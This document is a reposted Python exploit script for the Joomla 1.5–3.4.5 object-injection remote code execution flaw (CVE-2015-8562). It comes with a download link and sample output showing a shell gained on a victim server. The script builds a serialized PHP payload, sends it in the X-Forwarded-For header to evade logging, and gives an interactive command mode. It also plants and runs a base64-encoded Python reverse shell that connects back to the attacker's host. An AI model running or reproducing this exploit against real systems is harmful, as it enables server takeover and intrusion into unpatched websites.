Joomla 1.5 - 3.4.5 - RCE

1. other vuln joomla :
2. Links: http://pan.baidu.com/s/1hqWbGGk Password: 27hj
3. own install Python environment
4. Source article: http: //www.t00ts.net/post-304.html
5.  
6. #!/usr/bin/env python
7.  
8. # Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
9. # Date: 12/17/2015
10. # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
11. # Vendor Homepage: https://www.joomla.org/
12. # Software Link: http://joomlacode.org/gf/project/joomla/frs/
13. # Version: Joomla 1.5 - 3.4.5
14. # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
15. # CVE : CVE-2015-8562
16.  
17.  
18. '''
19. Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
20. PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
21.  
22. Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com):
23. https://www.exploit-db.com/exploits/38977/
24.  
25. Vulnerability Info, Exploit, Detection:
26. https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
27.  
28. Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log
29.  
30. Usage - Automate Blind RCE:
31. python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
32. $ touch /tmp/newhnewh
33.  
34. Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
35. python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
36. [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
37. [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444
38. <Response [200]>
39. [+] Spawning reverse shell....
40. <Response [200]>
41.  
42. Listening on [0.0.0.0] (family 0, port 4444)
43. $ python -c "import pty;pty.spawn('/bin/bash')"
44. www-data@ubuntu:/$ id
45. uid=33(www-data) gid=33(www-data) groups=33(www-data)
46. www-data@ubuntu:/$
47.  
48. '''
49.  
50. import requests
51. import subprocess
52. import argparse
53. import sys
54. import base64
55.  
56. # Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
57. def get_url(url, user_agent):
58.  
59. headers = {
60. 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
61. 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA
62. }
63. cookies = requests.get(url,headers=headers).cookies
64. for _ in range(3):
65. response = requests.get(url, headers=headers,cookies=cookies)
66. return response
67.  
68.  
69. def php_str_noquotes(data):
70. "Convert string to chr(xx).chr(xx) for use in php"
71. encoded = ""
72. for char in data:
73. encoded += "chr({0}).".format(ord(char))
74.  
75. return encoded[:-1]
76.  
77.  
78. def generate_payload(php_payload):
79.  
80. php_payload = "eval({0})".format(php_str_noquotes(php_payload))
81.  
82. terminate = '\xf0\xfd\xfd\xfd';
83. exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
84. injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
85. exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
86. exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
87.  
88. return exploit_template
89.  
90.  
91. def main():
92. parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')
93. parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
94. parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')
95. parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')
96. parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
97.  
98. args = parser.parse_args()
99.  
100. if args.cmd:
101. print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
102. print "[-] Dropping into shell-like environment to perform blind RCE"
103. while True:
104. command = raw_input('$ ')
105. cmd_str = "system('{}');".format(command)
106. pl = generate_payload(cmd_str)
107. print get_url(args.RHOST, pl)
108.  
109. # Spawn Reverse Shell using Netcat listener + Python shell on victim
110. elif args.LPORT and args.LPORT:
111. connection = "'{}', {}".format(args.LHOST, args.LPORT)
112.  
113. # pentestmonkey's Python reverse shell one-liner:
114. shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'''
115. # Base64 encoded the Python reverse shell as some chars were messing up in the exploit
116. encoded_comm = base64.b64encode(shell_str)
117. # Stage 1 payload Str
118. payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
119. print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST)
120. print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT)
121. # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py"
122. pl = generate_payload("system('"+payload+"');")
123. print get_url(args.RHOST, pl)
124. # Spawns Shell listener using netcat on LHOST
125. listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT])
126. print "[+] Spawning reverse shell...."
127. # Stage 2: Executes Python reverse shell back to LHOST:LPORT
128. pl = generate_payload("system('python /tmp/newhnewh.py');")
129. print get_url(args.RHOST, pl)
130. else:
131. print '[!] missing arguments'
132. parser.print_help()
133.  
134.  
135. if __name__ == "__main__":
136. main()